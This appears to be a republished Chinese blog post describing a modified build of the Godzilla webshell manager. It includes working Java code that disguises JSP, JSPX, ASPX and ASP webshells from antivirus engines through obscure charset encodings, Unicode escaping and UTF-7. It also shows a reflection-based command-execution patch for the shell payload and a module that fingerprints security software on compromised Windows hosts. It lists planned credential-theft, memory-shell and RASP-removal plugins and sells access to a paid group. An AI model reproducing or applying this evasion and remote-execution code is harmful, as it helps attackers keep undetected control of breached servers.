文章总结: 文章介绍哥斯拉特战版二开,重点升级jsp/jspx、aspx/asp/php等WebShell免杀能力,通过小众编码、超级混淆、Unicode转换绕过检测;同时改进Java命令执行方式并新增杀软识别模块,后续计划扩展加密、后渗透插件与RASP对抗功能,强调仅供学习禁止非法使用。 综合评分: 78 文章分类: 免杀,WEB安全,渗透测试,红队,恶意软件
哥斯拉特战版二开-纷传小圈
原创
zyxa
众亦信安
2026年1月12日 11:40 湖南
声明:文中涉及到的技术和工具,仅供学习使用,禁止从事任何非法活动,如因此造成的直接或间接损失,均由使用者自行承担责任。
众亦信安,中意你啊!
温馨提示:当前公众号推送机制调整,仅常读及星标账号可展示大图推送。建议各位将众亦信安团队设为“星标“,以便及时接收我们的最新内容与技术分享。
1:修改jsp/jspx免杀,增加相关xml头部编码
特战版免杀相关核心代码位于core/shellprocessor中
jsp/jspx免杀分为escaps和unicode模块,其中模块对应的分别为超级混淆和unicode免杀
Tomcat内部支持了很多小众的字符集编码,如果检测引擎不支持这种编码的解析,则对其而言就是一堆无法识别的乱码。所以我们可以利用这些小众编码来进行绕过这里参考文章
https://ti.aliyun.com/#/log?id=29
超级混淆实现的逻辑位于JspEscapesProcessor代码中的doProcessor函数中
public byte[] doProcessor(byte[] shell, String suffix, EscapesOptionsescapesOptions) { this.options = escapesOptions; ByteBuffer byteBuffer = newByteBuffer(shell); String globalCodeStartLabel ="<jsp:declaration>"; String globalCodeEndLabel ="</jsp:declaration>"; String codeStartLabel ="<jsp:scriptlet>"; String codeEndLabel ="</jsp:scriptlet>"; if("jsp".equals(suffix)) { int jspxLabelIndex =byteBuffer.index(0, "<%!"); if (jspxLabelIndex < 0) { jspxLabelIndex =byteBuffer.index(0, "<%"); } byteBuffer.append("<jsp:rootxmlns:jsp=\"http://java.sun.com/JSP/Page\"version=\"1.2\">", jspxLabelIndex); byteBuffer.append("</jsp:root>", byteBuffer.length()); byteBuffer.replaceFirst("<%!", globalCodeStartLabel,jspxLabelIndex); byteBuffer.replaceFirst("%>", globalCodeEndLabel,jspxLabelIndex); byteBuffer.replaceFirst("<%", codeStartLabel, jspxLabelIndex); byteBuffer.replaceFirst("%>", codeEndLabel,jspxLabelIndex); } ByteBuffer globalCodeByteBuffer =byteBuffer.subMiddleBytes(globalCodeStartLabel, globalCodeEndLabel); ByteBuffer codeByteBuffer =byteBuffer.subMiddleBytes(codeStartLabel, codeEndLabel); ByteBufferglobalCodeNewByteBuffer = newByteBuffer(this.processor(globalCodeByteBuffer.getBytes())); byteBuffer.replace(globalCodeByteBuffer.getBytes(),globalCodeNewByteBuffer.getBytes()); ByteBuffer codeNewByteBuffer =new ByteBuffer(this.processor(codeByteBuffer.getBytes())); byteBuffer.replace(codeByteBuffer.getBytes(),codeNewByteBuffer.getBytes()); return byteBuffer.getBytes(); }
这里我们增加如下代码
if (!this.options.EncodingMethod.equals("关闭")) { try { String declaration = "<?xml version=\"1.0\" encoding=\"" + this.options.EncodingMethod + "\" ?>"; if (!this.options.isEncodingHeader) { declaration = ""; }
byte[] declarationBytes = declaration.getBytes("UTF-8"); byte[] currentBytes = byteBuffer.getBytes(); String content = new String(currentBytes, "UTF-8"); byte[] ibm037Bytes = content.getBytes(this.options.EncodingMethod); byte[] combinedBytes = new byte[declarationBytes.length + ibm037Bytes.length]; System.arraycopy(declarationBytes, 0, combinedBytes, 0, declarationBytes.length); System.arraycopy(ibm037Bytes, 0, combinedBytes, declarationBytes.length, ibm037Bytes.length); byteBuffer = new ByteBuffer(combinedBytes); } catch (UnsupportedEncodingException var15) { var15.printStackTrace(); } }
这里代码如果不理解的话直接丢ai,再修改控制器流程
public static JspEscapesProcessor.EscapesOptions chooseEscapes(String[] escapesMethods) { JspEscapesProcessor.EscapesOptions options = new JspEscapesProcessor.EscapesOptions(); ChooseEscapes dialog = new ChooseEscapes(); Arrays.stream(escapesMethods).forEach((method) -> { dialog.escapesListComboBox.addItem(method); }); String[] IBMLIST = new String[]{"关闭", "cp037", "cp290", "utf-16le", "utf-16be", "utf-32le", "utf-32be", "IBM01145", "IBM01146"}; Arrays.stream(IBMLIST).forEach((method) -> { dialog.EncodingComboBox.addItem(method); }); dialog.setTitle(EasyI18N.getI18nString("混淆配置")); dialog.setLocationRelativeTo(MainActivity.getFrame()); dialog.pack(); dialog.setVisible(true); options.escapeMethod = dialog.escapesListComboBox.getSelectedItem().toString(); options.EncodingMethod = dialog.EncodingComboBox.getSelectedItem().toString(); options.isEncodingHeader = dialog.EncodingCheckBox.isSelected(); options.isAppendLitter = dialog.isAppendLitterCheckBox.isSelected(); options.isDoubleConfusion = dialog.isDoubleConfusionCheckBox.isSelected(); options.isRandomConfusion = dialog.isRandomConfusionCheckBox.isSelected(); options.minLitterNumber = Integer.parseInt(dialog.litterMinLengthTextField.getText()); options.maxLitterNumber = Integer.parseInt(dialog.litterMaxLengthTextField.getText()); return options; }
最后增加ui设计
this.EncodingLabel = new JLabel(); this.EncodingLabel.setText("编码(编码后请勿复制粘贴传输):"); panel3.add(this.EncodingLabel, new GridConstraints(6, 0, 1, 1, 8, 0, 0, 0, (Dimension)null, (Dimension)null, (Dimension)null, 0, false)); this.EncodingComboBox = new JComboBox(); panel3.add(this.EncodingComboBox, new GridConstraints(6, 1, 1, 1, 8, 1, 2, 0, (Dimension)null, (Dimension)null, (Dimension)null, 0, false)); this.EncodingTitleLabel = new JLabel(); this.EncodingTitleLabel.setText("编码头部声明(不勾选此选项可能导致不解析):"); panel3.add(this.EncodingTitleLabel, new GridConstraints(7, 0, 1, 1, 8, 0, 0, 0, (Dimension)null, (Dimension)null, (Dimension)null, 0, false)); this.EncodingCheckBox = new JCheckBox(); this.EncodingCheckBox.setText("开启"); this.EncodingCheckBox.setSelected(true);
#
2:增加aspx/asp/php免杀
2.1:aspx免杀
这里有人会对后面可能会产生一个疑问为啥能直接在那个目录下创建他就能生成
core/shellprocessor/StartProcessor文件中的代码,可以看到他是对class进行一个扫描,所以我们可以自己在/core/shellprocessor目录下自定义方法
static { ApplicationContext.scanClass(ApplicationContext.class.getResource("/core/shellprocessor/"), "core.shellprocessor", ShellProcessor.class, GenerateProcessor.class).forEach((c) -> { GenerateProcessor processorAnnotation = (GenerateProcessor)c.getAnnotation(GenerateProcessor.class); Arrays.stream(processorAnnotation.superTemplate()).forEach((templateName) -> { LinkedHashSet classes = null; if (processors.containsKey(templateName)) { classes = (LinkedHashSet)processors.get(templateName); } else { classes = new LinkedHashSet(); processors.put(templateName, classes); }
classes.add(c); }); }); }
增加unicode加密
package core.shellprocessor.aspxUnicode;
import core.annotation.GenerateProcessor;import core.imp.ShellProcessor;
@GenerateProcessor( DisplayName = "Unicode", superTemplate = {"aspx", "ashx", "asmx", "soap"})public class ASPXUnicode implements ShellProcessor { public ASPXUnicode() { }
public static String string2Unicode(String str) { StringBuffer unicode = new StringBuffer();
for(int i = 0; i < str.length(); ++i) { char c = str.charAt(i); if (String.valueOf(c).equals(".")) { unicode.append(c); } else { unicode.append("\\u00" + Integer.toHexString(c)); } }
return unicode.toString(); }
public static String encoderAspx(String text) { String[] list = new String[]{"BinaryRead", "ContentLength", "Context.Request", "Context.Response", "Context.Session", "BinaryWrite", "ComputeHash", "CreateDecryptor", "CreateEncryptor", "Cryptography", "GetMethod", "MD5CryptoServiceProvider", "RijndaelManaged", "System.BitConverter", "System.Convert", "FromBase64String", "ToBase64String", "System.IO.MemoryStream", "System.Reflection", "Assembly", "System.Security", "System.Text.Encoding.Default.GetBytes", "System.Type", "ToString", "TransformFinalBlock", "magicNum1", "magicNum2", "CreateInstance"}; String result = text;
for(int i = 0; i < list.length; ++i) { String s = list[i]; int index = text.indexOf(s); if (index != -1) { result = result.replace(s, string2Unicode(s)); } }
return result; }
public byte[] doProcessor(byte[] shell, String suffix) { String shellContent = new String(shell); shellContent = encoderAspx(shellContent); return shellContent.getBytes(); }}
2.2:asp免杀
asp同理,创建自定义方法就行,这里我们选择常见的utf-7
public static String utf7_encode(String text) throws Exception { byte[] s = text.getBytes("utf-16be"); String result = "";
Class baseCls; try { baseCls = Class.forName("java.util.Base64"); Object Encoder = baseCls.getMethod("getEncoder", (Class[])null).invoke(baseCls, (Object[])null); Class enen = Encoder.getClass(); result = (String)enen.getMethod("encode", byte[].class).invoke(Encoder, s); result = result.replace("\n", "").replace("\r", "").replace("=", "").replace("/", ","); } catch (Throwable var7) { baseCls = Class.forName("sun.misc.BASE64Encoder"); Object Encoder = baseCls.newInstance(); Class enen = Encoder.getClass(); result = (String)enen.getMethod("encode", byte[].class).invoke(Encoder, s); result = result.replace("\n", "").replace("\r", "").replace("=", "").replace("/", ","); }
return result; }
public static String utf7_decode(String text) throws Exception { text = text.replace(",", "/") + "=="; byte[] data = text.getBytes();
byte[] decodebs; Class baseCls; try { baseCls = Class.forName("java.util.Base64"); Object Decoder = baseCls.getMethod("getDecoder", (Class[])null).invoke(baseCls, (Object[])null); Class dede = Decoder.getClass(); decodebs = (byte[])((byte[])dede.getMethod("decode", byte[].class).invoke(Decoder, data)); } catch (Throwable var7) { baseCls = Class.forName("sun.misc.BASE64Decoder"); Object Decoder = baseCls.newInstance(); Class dede = Decoder.getClass(); decodebs = (byte[])((byte[])dede.getMethod("decodeBuffer", String.class).invoke(Decoder, new String(data))); }
text = new String(decodebs, "utf-16be"); return text; }
2.3:php免杀,php同理这里就不一一概述
3:修改java内置命令执行方式
这里我们提取gsl payload里面的payload.classs,修改为payload.class放入idea中,找到execCommand函数
修改命令执行函数
Class<?> pbClass = Class.forName("java.lang.ProcessBuilder"); java.util.List<String> cmdList = new java.util.ArrayList<>(); if (System.getProperty("os.name").toLowerCase().contains("win")) { cmdList.add("cmd.exe"); cmdList.add("/c"); } else { cmdList.add("/bin/sh"); cmdList.add("-c"); } cmdList.addAll(var3); java.lang.reflect.Constructor<?> ctor = pbClass.getConstructor(java.util.List.class); Object pb = ctor.newInstance(cmdList); java.lang.reflect.Method startMethod = pbClass.getMethod("start"); var2 = (Process) startMethod.invoke(pb);
之后重新编译打包进去
#
4:增加杀软识别
#
package core.ui;
import cn.hutool.json.JSONObject;import cn.hutool.json.JSONUtil;import core.Encoding;import core.annotation.DisplayName;import core.imp.Payload;import core.shell.ShellEntity;import core.ui.component.DataView;import core.ui.component.dialog.GOptionPane;import java.awt.BorderLayout;import java.awt.event.ActionEvent;import java.io.IOException;import java.io.InputStream;import java.util.ArrayList;import java.util.Arrays;import java.util.Collections;import java.util.HashMap;import java.util.Iterator;import java.util.Set;import java.util.Vector;import java.util.concurrent.CopyOnWriteArrayList;import javax.swing.JButton;import javax.swing.JPanel;import javax.swing.JScrollPane;import javax.swing.JSplitPane;import util.Log;import util.automaticBindClick;import util.functions;@DisplayName( DisplayName = "杀软详情")public class ShellAvscan extends JPanel { private static final Vector COLUMNS_VECTOR = new Vector(new CopyOnWriteArrayList(new String[]{"序号", "进程名称", "PID", "杀软名称"})); private static final HashMap<String, String> LINUX_INET_FILE_MAPPING = new HashMap(); private static final HashMap<String, String> LINUX_TCP_STATUS_MAPPING = new HashMap(); private final DataView dataView; private final JButton getButton; private final JSplitPane portScanSplitPane; private final ShellEntity shellEntity; private final Payload payload; private Encoding encoding; public ShellAvscan(ShellEntity shellEntity) { this.shellEntity = shellEntity; this.payload = shellEntity.getPayloadModule(); this.getButton = new JButton("scan"); this.dataView = new DataView((Vector)null, COLUMNS_VECTOR, -1, -1); this.portScanSplitPane = new JSplitPane(); this.portScanSplitPane.setOrientation(0); this.portScanSplitPane.setDividerSize(0); JPanel topPanel = new JPanel(); topPanel.add(this.getButton); this.portScanSplitPane.setTopComponent(topPanel); this.portScanSplitPane.setBottomComponent(new JScrollPane(this.dataView)); this.setLayout(new BorderLayout()); this.add(this.portScanSplitPane); automaticBindClick.bindJButtonClick(this, this); } private void getButtonClick(ActionEvent actionEvent) { try { Vector rowsVector = null; if (!this.payload.isWindows()) { GOptionPane.showMessageDialog(this, "目前只支持Windows系统的杀软识别!", "提示", 2); } else { rowsVector = this.getWinNet(); } this.dataView.AddRows(rowsVector); } catch (Exception var3) { Log.error(var3); } } private Vector<Vector<String>> getWinNet() throws IOException { Vector<Vector<String>> rows = new Vector(); String cmdResult = this.payload.execCommand("cmd.exe /c tasklist /svc").toLowerCase(); InputStream inputStream = ShellAvscan.class.getResourceAsStream("/data/av.json"); String ExtractBody = new String(functions.readInputStream(inputStream)); inputStream.close(); int i = 0; JSONObject jsonObject = JSONUtil.parseObj(ExtractBody); Set<String> keySet = jsonObject.keySet(); Iterator var8 = keySet.iterator(); while(true) { String key; String lkey; String value; char c; do { do { if (!var8.hasNext()) { return rows; } key = (String)var8.next(); lkey = key.toLowerCase(); value = jsonObject.getStr(key); } while(!cmdResult.contains(lkey)); int index = cmdResult.indexOf(lkey); c = cmdResult.charAt(index - 1); } while(c != '\n'); ++i; String[] pid_tmp = cmdResult.split(lkey)[1].split(" "); String pid = "0"; for(int j = 0; j < pid_tmp.length; ++j) { if (pid_tmp[j].length() > 0) { if (functions.isNumeric(pid_tmp[j])) { pid = pid_tmp[j]; break; } pid = "0"; } } Vector<String> oneRow = new Vector(); oneRow.add(String.valueOf(i)); oneRow.add(key); oneRow.add(pid); if (functions.isMessyCode(value)) { value = new String(value.getBytes("GBK"), "utf-8"); } oneRow.add(value); rows.add(oneRow); } } private String Inet4Addr(String hex) { String[] strings = hex.split(":"); String ip = linuxHexToIP(strings[0]); int port = functions.byteToInt2(functions.hexToByte(strings[1])); return ip + ":" + port; } public static String linuxHexToIP(String hexString) { ArrayList<String> arrayList = new ArrayList(); byte[] bs = functions.hexToByte(hexString); byte[] var3 = bs; int var4 = bs.length; for(int var5 = 0; var5 < var4; ++var5) { byte b = var3[var5]; arrayList.add(Integer.toString(b & 255)); } Collections.reverse(arrayList); return Arrays.toString(arrayList.toArray()).replace(" ", "").replace("[", "").replace("]", "").replace(",", ".").trim(); }}
#
5:后续更新计划
#
Todo:
1:增加新的加密方式,过相关安全设备
2:增加后渗透插件,一键获取内网敏感信息,提取浏览器信息等
3:增加后渗透插件,一键获取相关oa信息
4:增加一键注入内存马工具,可以任意注入相关class文件
5:增加rasp卸载工具,调用相关rasp内置函数反射卸载rasp
6:修改哥斯拉http传输方法,修改header头顺序,使其数据包更像正常的浏览器访问
7:更多……
圈子介绍
后续更新suo5二开、自研webshell管理工具、cs远控等,目前定价129/年,前30名的师傅享受85折优惠。
往这里看
点点关注不迷路,不定时持续分享各种干货。可关注公众号回复”进群”,也可添加管理微信拉你入群。
项目交流,src/众测挖掘,重大节日保障,攻防均可联系海哥微信。
入了小圈的朋友联系海哥进内部交流群。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:众亦信安 zyxa《哥斯拉特战版二开-纷传小圈》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论